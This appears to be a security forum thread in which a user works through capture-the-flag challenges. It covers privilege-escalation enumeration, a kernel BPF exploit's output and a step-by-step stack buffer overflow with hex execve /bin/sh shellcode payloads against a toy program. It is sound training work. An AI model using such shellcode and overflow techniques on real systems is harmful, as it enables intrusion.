Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us $3,400 per month for bandwidth bills alone, and since we don't believe in shoving popup ads to our registered users, we try to make the money back through forum registrations.
  • Post
  • Reply
Mopp
Oct 29, 2004



Alright, I got it confirmed that the way to root is not by misconfiguration but rather exploiting existing unpatched software on the server. So that means:

1. Anything unpatched in SUID/SGID?
2. Anything unpatched or otherwise exploitable running as root?

SUID/SGID output is here. I've been through the entire list and haven't found anything.
code:
-rwsr-xr-x 1 root root 43088 Jan  8  2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 44664 Aug 21  2019 /bin/su
-rwsr-xr-x 1 root root 26696 Jan  8  2020 /bin/umount
-rwsr-xr-x 1 root root 37136 Aug 21  2019 /usr/bin/newuidmap
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 40344 Aug 21  2019 /usr/bin/newgrp
-rwxr-sr-x 1 root shadow 22808 Aug 21  2019 /usr/bin/expiry
-rwxr-sr-x 1 root mlocate 43088 Mar  1  2018 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 10232 Oct 17  2019 /usr/bin/mlock
-rwsr-xr-x 1 root root 59640 Aug 21  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 76496 Aug 21  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Oct 10  2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 37136 Aug 21  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 44528 Aug 21  2019 /usr/bin/chsh
-rwxr-sr-x 1 root crontab 39352 Nov 16  2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 14328 Jan 17  2018 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 75824 Aug 21  2019 /usr/bin/gpasswd
-rwxr-sr-x 1 root tty 30800 Jan  8  2020 /usr/bin/wall
-rwxr-sr-x 1 root ssh 362640 Jan 10  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 71816 Aug 21  2019 /usr/bin/chage
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-- 1 root telnetd 10488 Nov  7  2016 /usr/lib/telnetlogin
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Jan 10  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwxr-sr-x 1 root shadow 34816 Feb 27  2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27  2019 /sbin/pam_extrausers_chkpwd
code:
ps -ef  | grep root | grep -v "\["
root         1     0  0 09:34 ?        00:00:02 /sbin/init
root       387     1  0 09:34 ?        00:00:04 /lib/systemd/systemd-journald
root       412     1  0 09:34 ?        00:00:00 /sbin/lvmetad -f
root       414     1  0 09:34 ?        00:00:00 /lib/systemd/systemd-udevd
root       836     1  0 09:35 ?        00:00:05 /usr/share/filebeat/bin/filebeat -environment systemd -e -d elasticsearch -c /etc/filebeat/filebeat.yml -path.home /usr/share/filebeat -path.config /etc/filebeat -path.data /var/lib/filebeat -path.logs /var/log/filebeat
root       842     1  0 09:35 ?        00:00:03 /usr/bin/lxcfs /var/lib/lxcfs/
root       882     1  0 09:35 ?        00:00:00 /lib/systemd/systemd-logind
root       883     1  0 09:35 ?        00:00:01 php-fpm: master process (/etc/php/7.3/fpm/php-fpm.conf)
root       884     1  0 09:35 ?        00:03:25 /usr/share/packetbeat/bin/packetbeat -environment systemd -e -d elasticsearch -c /etc/packetbeat/packetbeat.yml -path.home /usr/share/packetbeat -path.config /etc/packetbeat -path.data /var/lib/packetbeat -path.logs /var/log/packetbeat
root       892     1  0 09:35 ?        00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       906     1  0 09:35 ?        00:00:01 /usr/lib/accountsservice/accounts-daemon
root       915     1  0 09:35 ?        00:00:02 php /usr/bin/php-dns
root       953     1  0 09:35 ?        00:00:09 /usr/share/auditbeat/bin/auditbeat -environment systemd -e -d elasticsearch -c /etc/auditbeat/auditbeat.yml -path.home /usr/share/auditbeat -path.config /etc/auditbeat -path.data /var/lib/auditbeat -path.logs /var/log/auditbeat
root       956     1  0 09:35 ?        00:00:00 /usr/sbin/cron -f
root       980     1  0 09:35 ?        00:00:05 /usr/share/journalbeat/bin/journalbeat -environment systemd -e -d elasticsearch -c /etc/journalbeat/journalbeat.yml -path.home /usr/share/journalbeat -path.config /etc/journalbeat -path.data /var/lib/journalbeat -path.logs /var/log/journalbeat
root      1061     1  0 09:35 ?        00:00:02 /usr/lib/snapd/snapd
root      1103     1  0 09:35 ?        00:00:00 /usr/sbin/sshd -D -f /etc/ssh/backdoor_sshd_config
root      1124     1  0 09:35 ?        00:00:00 /usr/lib/policykit-1/polkitd --no-debug
root      1165     1  0 09:35 ttyS0    00:00:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root      1204     1  0 09:35 tty1     00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1384     1  0 09:35 ?        00:00:00 /usr/sbin/sshd -D
root      9269     1  0 14:52 ?        00:00:00 in.telnetd: ::ffff:10.0.0.2
root      9281  9269  0 14:52 pts/0    00:00:00 login -h ::ffff:10.0.0.2 -p
I'm ruling out
* All beat-services, no exploits.
* SSHd. Patched and secure.
* Cron, no exploits. Nothing in crontab.
* Google Cloud workers, out of scope.
* polkitd (v0.103, not exploitable)
* snapd, latest version.
* networkd-dispatcher (nothing found)
* accountsservice/accounts-daemon (nothing found)
* systemd-* (systemd is v237, no known exploits)
* agetty (no exploits)
* lxcfs (not member of lxd group => no exploits)
* lvmetad (no known exploits...)
* in.telnetd - no known exploits

we're left with

code:
root       883     1  0 09:35 ?        00:00:01 php-fpm: master process (/etc/php/7.3/fpm/php-fpm.conf)
root       915     1  0 09:35 ?        00:00:02 php /usr/bin/php-dns
Other things I've found:,
https://github.com/neex/phuip-fpizdam
https://github.com/whotwagner/logrotten would work, but we dont fulfill the prerequistes.


Regarding the PHP exploit then:
code:
cat /etc/php/7.3/fpm/php-fpm.conf | grep -v ";"
[global]
pid = /run/php/php7.3-fpm.pid
error_log = /var/log/php7.3-fpm.log
include=/etc/php/7.3/fpm/pool.d/*.conf
code:
$ cat /etc/php/7.3/fpm/pool.d/www.conf | grep -v ";"
[www]
user = www-data
group = www-data
listen = /run/php/php7.3-fpm.sock
listen.owner = www-data
listen.group = www-data
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
So the workers only listen on a socket, which is owned by www-data. I don't have write access to the socket, then I could use a fcgi to talk with it and get it to execute.

I've ran the dpkg package list in tools which look at CVEs and exploitdb, but no joy.

Alright... Any ideas? Might just be that I missed something in the enumeration part, it usually is. Hopefully someone old and grizzled can tell me that I forgot to look in some obvious place.

Mopp fucked around with this message at 17:53 on Sep 9, 2020

Adbot
ADBOT LOVES YOU

uniball
Oct 10, 2003



i'm thinking it's php-dns-server specifically. can you see the entire install? see if you can figure out what version it is and check what the commits on github right after that might have fixed or changed.

what does /etc/phpdns.json look like?

can you actually query the DNS server? can you get it to act up if you try to query weird garbage?

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

Why did I wait until I was old to start to do CTF stuff? I've been doing the overthewire basic stuff and it's puzzle fun that rewards decades of accumulated software trivia.

uniball
Oct 10, 2003



yeah ctfs and boot2roots are great when youíre in the mood. thereís nothin like getting a flag before anyone else. iíve been meaning to get back into it, itís been a couple years

spankmeister
Jun 15, 2008








Slippery Tilde

Subjunctive posted:

Why did I wait until I was old to start to do CTF stuff? I've been doing the overthewire basic stuff and it's puzzle fun that rewards decades of accumulated software trivia.

Wait till this guy gets a load of Hack the Box

Internet Explorer
Jun 1, 2005





Oven Wrangler

I know this has been done before, but I feel like it's been a while. What 3 resources would you all recommend for IT generalists who want to stay up to speed on InfoSec stuff? I feel like I get enough through osmosis these days, but I want something that I can recommend to colleagues who aren't as plugged in.

EVIL Gibson
Mar 23, 2001

Internet of Things is just someone else's computer that people can't help attaching cameras and door locks to!


Switchblade Switcharoo

spankmeister posted:

Wait till this guy gets a load of Hack the Box

hack the box is cool especially when you root something a handfull of people get and there are some good people on there.

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

yeah I doubt Iíll ever be good enough to race or otherwise compete, but theyíre fun puzzles to wake up in the middle of the night with an answer to

Pablo Bluth
Sep 7, 2007

I've made a huge mistake.


Internet Explorer posted:

I know this has been done before, but I feel like it's been a while. What 3 resources would you all recommend for IT generalists who want to stay up to speed on InfoSec stuff? I feel like I get enough through osmosis these days, but I want something that I can recommend to colleagues who aren't as plugged in.
I don't know if it's what your after but I find the Risky Business podcast an interesting listen.
https://risky.biz/

Achmed Jones
Oct 16, 2004









Shredded Hen


Check sudo version and sudoers (though you said it wasn't a misconfiguration so sudoers is prob fine)

Also the thing I said re: the auto loaded composer file being world writeable. Sometimes the file will be writeable but not discoverable via eg find due to perms on its parent dir, but you can write to it if you know its path

EVIL Gibson
Mar 23, 2001

Internet of Things is just someone else's computer that people can't help attaching cameras and door locks to!


Switchblade Switcharoo

uniball posted:

i'm thinking it's php-dns-server specifically. can you see the entire install? see if you can figure out what version it is and check what the commits on github right after that might have fixed or changed.

what does /etc/phpdns.json look like?

can you actually query the DNS server? can you get it to act up if you try to query weird garbage?

I'll agree with uniball. Usually VM challenge machines demonstrate one or maybe a few handful of exploits but it's always out of the blue like something not found or installed in base server image which what php-dns is basically so that's why a lot of us are looking at it.

Unless it's something like Metaspoitable or DVWA or a CTF, it's usually to demonstrate something really weird and fun to learn about.

Another thing I like to look at is stuff that sticks out. I am looking at the services running and they mainly concentrate around images made ~2019-2020 but the one from 2016 that you can check right now.

quote:

-rwsr-xr-x 1 root root 75824 Aug 21 2019 /usr/bin/gpasswd
-rwxr-sr-x 1 root tty 30800 Jan 8 2020 /usr/bin/wall
-rwxr-sr-x 1 root ssh 362640 Jan 10 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 71816 Aug 21 2019 /usr/bin/chage
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-- 1 root telnetd 10488 Nov 7 2016 /usr/lib/telnetlogin
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Jan 10 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter




quote:

root 9269 1 0 14:52 ? 00:00:00 in.telnetd: ::ffff:10.0.0.2
root 9281 9269 0 14:52 pts/0 00:00:00 login -h ::ffff:10.0.0.2 -p

Plus it looks like someone is logged in either directly or through agetty.

Run a netscan on it and set the level to high to try to get an accurate fingerprint. I know you looked at it, but look at it harder. It looks freaking weird how it's there and how old the binary is.

Agetty is usually used to manage VMs easily in CTFs, but maybe they forgot to turn it off though. Maybe telnet as well..

evil_bunnY
Apr 2, 2003



What's the version of utempter on that box?

Subjunctive posted:

yeah I doubt Iíll ever be good enough to race or otherwise compete, but theyíre fun puzzles to wake up in the middle of the night with an answer to
That's why you play in teams. No one is good enough to consistently perform faster than everyone else, but some CTF teams are terrifying.

evil_bunnY fucked around with this message at 07:11 on Sep 10, 2020

Internet Explorer
Jun 1, 2005





Oven Wrangler

Pablo Bluth posted:

I don't know if it's what your after but I find the Risky Business podcast an interesting listen.
https://risky.biz/

Definitely! Thank you.

Mopp
Oct 29, 2004



well i can tell you that after hours and hours, it's the kernel that's exploitable.

I used https://raw.githubusercontent.com/b...inux-hardened.c. could swear that i've tried this exploit from edb with no success, but don't care anymore. got the flag.

code:
$ ./a.out 
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] Leaking sock struct from ffff90e2db5b8800
[*] found sock->sk_rcvtimeo at offset 576
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff90e2fa2e63c0
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1000(ubuntu)
thanks for all the tips. the journey continues.

The Iron Rose
May 12, 2012

Cat Army


this was a fascinating and educational adventure to read along with, I learned a thing or two! thanks for posting about it

duck monster
Dec 15, 2004



Balsa posted:

MS is a means to a end. It really depends on what you are doing. I find its better to understand the issue of why the exploit even works so you can tell blue team how to prevent a issue like this from being a issue in the first place!

Its really useful as a tool to convince your non tech CEO that allocating some money to getting an external security audit is a smart move though.

Disabusing the suits of a false sense of security "But the database server is behind the firewall!" is worth it 100% of the time.

spankmeister
Jun 15, 2008








Slippery Tilde

Subjunctive posted:

yeah I doubt I’ll ever be good enough to race or otherwise compete, but they’re fun puzzles to wake up in the middle of the night with an answer to

I had this happen with a pwnable the other day and it's hilarious when it does.

CommieGIR
Aug 22, 2006

If Godzilla can do it, you know I can deliver!

Pillbug

https://twitter.com/alt_kia/status/...9199884288?s=20

Breaker breaker, I got an RC-135 tracking me, anybody got your ears on, I need a convoy...

Methylethylaldehyde
Oct 23, 2004

BAKA BAKA


CommieGIR posted:

https://twitter.com/alt_kia/status/...9199884288?s=20

Breaker breaker, I got an RC-135 tracking me, anybody got your ears on, I need a convoy...

I can't wait for the GPS spoofers to get cheap enough that for ~some reason~ your GPS seems to think it's in the middle of Kansas somewhere, no matter what you try to do to fix it!

duck monster
Dec 15, 2004



CommieGIR posted:

https://twitter.com/alt_kia/status/...9199884288?s=20

Breaker breaker, I got an RC-135 tracking me, anybody got your ears on, I need a convoy...

I'm going to assume these are from the same people that brought us $500 usb cables with "quantum field stabilizers".

Because christ almighty theres a market to be plundered in stupid paranoid boomers with no radar for scams.

Diva Cupcake
Aug 15, 2005



fun
https://twitter.com/wdormann/status/1305564045282598912

RFC2324
Jun 7, 2012

Http 418


duck monster posted:

I'm going to assume these are from the same people that brought us $500 usb cables with "quantum field stabilizers".

Because christ almighty theres a market to be plundered in stupid paranoid boomers with no radar for scams.

I mean, when you grow up in an environment where scams are illegal and immediately get scammed into voting those protections away....

spankmeister
Jun 15, 2008








Slippery Tilde


Yeah it's a doozy. Here's a writeup by the person who discovered the bug:

https://www.secura.com/pathtoimg.php?id=2055

Sri.Theo
Apr 16, 2008


Did anyone post this story about "hacking" Tony Abbott, the former PM of Australia?

https://mango.pdf.zone/finding-form...er-on-instagram

It's more funny for the lengths he goes to report the thing then the actual exploit.

Mopp
Oct 29, 2004



I'm doing a simple buffer overflow with a twist that's messing with me.

I got the source code where the critical part is this:

code:
int main(int argc, char * argv[]) {
  if (argc == 1) {
    printf("Give me a string to check if it is palindrome\n");
    return 1;
  }

  char buf[128];

  char * word = argv[1];
  if (!isPalindrome(word)) {
    printf(""%s" is not a palindrome\n", word);
  } else {
    strcpy(buf, word);
    printf(""%s" is a palindrome and was written to the memory address %p.\n", buf, & buf);
  }

  return 0;
}
So it only overflows if the input argument is a palindrome...

I wrote a small script to create palindrome payloads, and I got control of RIP. The RIP offset is 152, so calling it with a payload of "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" will overflow the program as below.



The trouble I'm having now is that I can't find an address to jump to, or don't know how to using these tools (first time using gdb/pwngdb). There is a JMP RSP instruction at 0x00000000004007fb, but I don't know how to input an address with \x00 (null byte) as they get ignored in bash and the address becomes corrupted.

In order to create the payloads, I made a small script to put together the shellcode + eip + padding and output the string as python compatible palindrome payload. A non working example then looks like this:

code:
./bo $(python -c 'print("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x68\xdf\xff\xff\xff\x7f\x00\x00\x00\x00\x7f\xff\xff\xff\xdf\x68\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x05\x0f\x3b\xb0\x5e\x54\x57\x52\x99\x5f\x54\x53\xdb\xf7\x48\xff\x97\x8c\xd0\x91\x96\x9d\xd1\xbb\x48\xc0\x31")')
bash: warning: command substitution: ignored null byte in input
"1�H�ѝ��Ќ��H��ST_�RWT^�;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh��������hAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�^TWR�_TS��H���Б��ѻH�1" is a palindrome and was written to the memory address 0x7ffe88b12040.
Segmentation fault
Any ideas on how to proceed?

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

Given that the buffer overflow uses strcpy, having a null byte in your payload means that it'll stop copying at that point, so even if you were able to pass it your overflow wouldn't work the way you wanted anyway. Trying to do things without needing to embed nulls is part of the fun of this sort of puzzle.

I assume the stack is executable, since you're already trying to jump to it. I notice the program prints out the memory address that it's writing the string to - is that consistent from run-to-run?

Mopp
Oct 29, 2004



yeah, figured as much. the address changes every time.

edit:

correction: the address does not change every time... I thought it did when trying my payload but apparently not.

Mopp fucked around with this message at 10:51 on Sep 19, 2020

spankmeister
Jun 15, 2008








Slippery Tilde

Well, you can probably embed one null in your input. If the palindrome check function keeps the null bytes intact the strcpy after it will copy up to and including the null byte and discard the rest. So you'd just make an input that has your desired eip address at the end including the null byte, then just mirror everything and stick it behind to pass that check.

Not sure if it'll help in this case but on 32 bit that would be enough to get into the 0040XXXX range and you'd be golden.

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

Okay, so you can't hardcode the address of that stack buffer. But you do have the address of that buffer pushed into memory in that printf call. Are there any gadgets you can find that could make use of that?

If the address doesn't change then looking for a gadget to explicitly jump to the stack pointer is a bit overcomplicated...

Mopp
Oct 29, 2004



spankmeister posted:

Well, you can probably embed one null in your input. If the palindrome check function keeps the null bytes intact the strcpy after it will copy up to and including the null byte and discard the rest. So you'd just make an input that has your desired eip address at the end including the null byte, then just mirror everything and stick it behind to pass that check.

Not sure if it'll help in this case but on 32 bit that would be enough to get into the 0040XXXX range and you'd be golden.

From what I've found it's not possible to input null bytes using bash, so I'm currently stuck on that. The problem is visible in the first post.

The program output is that is has written the word into 0x7fffffffe2d0, which seems to contain the entire payload.



So to get code execution, I would like to insert shellcode + padding to index 152 + 0x7fffffffe2d0.

this gives me the palindrome payload:
code:
\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xd0\xe2\xff\xff\xff\x7f\x00\x00\x00\x00\x7f\xff\xff\xff\xe2\xd0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x05\x0f\x3b\xb0\x5e\x54\x57\x52\x99\x5f\x54\x53\xdb\xf7\x48\xff\x97\x8c\xd0\x91\x96\x9d\xd1\xbb\x48\xc0\x31
Now this has the dreaded null bytes in the middle at offset 160, but lets test it.



The null bytes did not make execution, so the RIP address is corrupted.



The shellcode payload is at the correct place, so the only thing is to get the correct address into memory.

Again: I'll gladly take any ideas you got.

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

The return address that's already there probably has the relevant nulls in it already, right?

What if you make your payload shorter, so that you're not overwriting those nulls? That way you'd only need to write the lower six bytes of the address you want to return to.

Mopp
Oct 29, 2004



Jabor posted:

The return address that's already there probably has the relevant nulls in it already, right?

What if you make your payload shorter, so that you're not overwriting those nulls? That way you'd only need to write the lower six bytes of the address you want to return to.

I don't think that will work. Even if I make the payload shorter, there is still a continuation after the RIP address due to the fact that it must be a palindrome. That part would then be copied into the RIP instead.

spankmeister
Jun 15, 2008








Slippery Tilde

Mopp posted:

From what I've found it's not possible to input null bytes using bash, so I'm currently stuck on that. The problem is visible in the first post.

Ah yeah it's taking input from an argument, not stdin. I overlooked that part.

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

Mopp posted:

I don't think that will work. Even if I make the payload shorter, there is still a continuation after the RIP address due to the fact that it must be a palindrome. That part would then be copied into the RIP instead.

What's stopping you making a palindrome with the return address at the end?

Mopp
Oct 29, 2004



spankmeister posted:

Ah yeah it's taking input from an argument, not stdin. I overlooked that part.

yeah, all info i've seen is that it's not possible to input null bytes as an argument...

Jabor posted:

What's stopping you making a palindrome with the return address at the end?

Not sure if I understand what you mean.

I'll try to simplify the problem:

1. I want to input the address 00BB into the RIP. The RIP overflows with the payload data at index 4. After changing the address to little endian, the payload would look like:

code:
AAAABB00
2. But since the input needs to be a valid palindrome it becomes:

code:
AAAABB0000BBAAAA
The problem I'm facing now is that I can't input null bytes as an argument, so the payloads gets distorted to

code:
AAAABBBBAAAA
and the value BBBB gets loaded into the RIP instead of 00BB.

Putting the return address at the end wouldn't change the content of the RIP, or am I getting it wrong?

edit:
so from the real scenario:

I want the address 0x7fffffffe2d0.

The payload with the RIP address and its mirrored part look like this:
code:
\xd0\xe2\xff\xff\xff\x7f\x00\x00\x00\x00\x7f\xff\xff\xff\xe2\xd0
this puts the following address in the rip: 0xff7f7fffffffe2d0
which again should be: 0x00007fffffffe2d0

second edit:

just understood what you meant: make a payload of total length 152+8 for RIP which in turn is a valid palindrome. That is a nice idea. I'll try that.

Mopp fucked around with this message at 12:32 on Sep 19, 2020

Mopp
Oct 29, 2004



alright, i've tried doing a shorter payload in the structure of:

payload = rip + buf + shellcode + (palindrome part)

with the total length of 152 + 8 bytes, so that the malicious address ends up at index 152-160 with the correct offset and the correct endian format.

the payload then looks like this:

code:
\x7f\xff\xff\xff\xe3\x70\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05\x05\x0f\x3b\xb0\x5f\x54\x53\x68\x73\x2f\x2f\x6e\x69\x62\x2f\xbb\x48\xf6\x31\x48\xd2\x31\x48\x50\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x70\xe3\xff\xff\xff\x7f
you can find the intended jump address in the beginning and end (0x7fffffffe370).

This is the result from running the payload:



This is an obvious result with the correct address but trailing with the remainder of the payload, but I don't know how to solve it.

I think I need to approach this from the beginning since this feels like a rabbit hole.

Anyone got any ideas on how to buffer overflow the code posted earlier would be highly appreciated.

Mopp
Oct 29, 2004



well, turns out i needed to just read up on 64 bit buffer overflows. after going through this guide https://www.codeproject.com/Article...rflows-in-Linux and drawing the payload up on paper, it was pretty clear how to proceed.



So the return address that gets loaded into RPI is stored directly after the base pointer. The buf variable is stored directly ahead of RBP and is 144 bytes.



Filling the buffer with 144 A shows that we are directly at the RBP. So an overflow payload would have to be 144 + 8 (for the RBP) + 6 (for the return address) = 158 bytes large.

To test this I made a simple palindrome payload with a new return address, NOPS and a cc interupt. you can see that the payload is mirrored around 0x7fffffffe3b0 and that the first bytes is the return address in big endian format.



the return address is directly after 0x7fffffffe400 and should be loaded after execution, which will then run a bunch of nops.



Success! After this, it was just a matter of creating a shellcode payload and inserting it to spawn a shell.

Thanks for all the help!

Mopp fucked around with this message at 10:39 on Sep 20, 2020

Cup Runneth Over
Aug 8, 2009

She said life's
too short to worry
She said life's
too long to wait
It's too short not
to love everybody
Life's too long to hate





https://twitter.com/Itmechr3/status/1308178096152023040

klosterdev
Oct 10, 2006

Na na na na na na na na Batman!

They're about to do it all over the nation if the Breonna Taylor decision is as slap-on-the-wrist as Louisville's locking down is for it to be

Adbot
ADBOT LOVES YOU

Sickening
Jul 15, 2007

BLack Summer was the Best Summer

Has anyone examined the salesforce outlook integration products and not immediately flag it all as high risk?

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply